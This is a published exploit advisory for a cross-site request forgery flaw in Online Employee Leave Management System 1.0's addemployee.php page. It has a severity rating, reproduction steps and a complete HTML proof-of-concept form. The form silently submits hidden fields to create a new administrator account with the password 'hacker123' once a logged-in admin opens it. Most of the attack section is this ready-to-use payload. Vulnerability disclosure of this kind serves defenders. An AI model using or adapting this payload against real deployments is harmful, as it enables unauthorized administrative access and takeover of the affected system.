Online Employee Leave Management System 1.0 Cross Site Request Forgery

2022.09.06
Credit: Amolo Hunters
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php) # Date: 05/09/2022 # Exploit Author: Amolo Hunters # Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php) Summary: ================ The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges. Severity Level: ================ 5.4 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Affected Product: ================ Online Employee Leave Management System v1.0 Steps to Reproduce: ================ 1. Create an HTML file and paste the following code: <html> <title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title> <center> <h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1> <p>by Amolo Hunters</p> <form action="http://target.com/elms/admin/addemployee.php" method="POST"> <input type="hidden" name="empcode" value="1337" /> <input type="hidden" name="firstName" value="AmoloHT" /> <input type="hidden" name="lastName" value="PoC" /> <input type="hidden" name="email" value="amoloht&#64;poc&#46;com" /> <input type="hidden" name="password" value="hacker123" /> <input type="hidden" name="confirmpassword" value="hacker123" /> <input type="hidden" name="gender" value="Other" /> <input type="hidden" name="dob" value="3&#32;June&#44;&#32;2022" /> <input type="hidden" name="department" value="Information&#32;Technology" /> <input type="hidden" name="country" value="Brazil" /> <input type="hidden" name="city" value="PoC" /> <input type="hidden" name="address" value="PoC" /> <input type="hidden" name="mobileno" value="0000000000" /> <input type="hidden" name="add" value="" /> <input type="submit" value="Submit request" /> </form> </center> </html> 2. Save the file and run it in the browser Note: you need to be logged in as an administrator


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top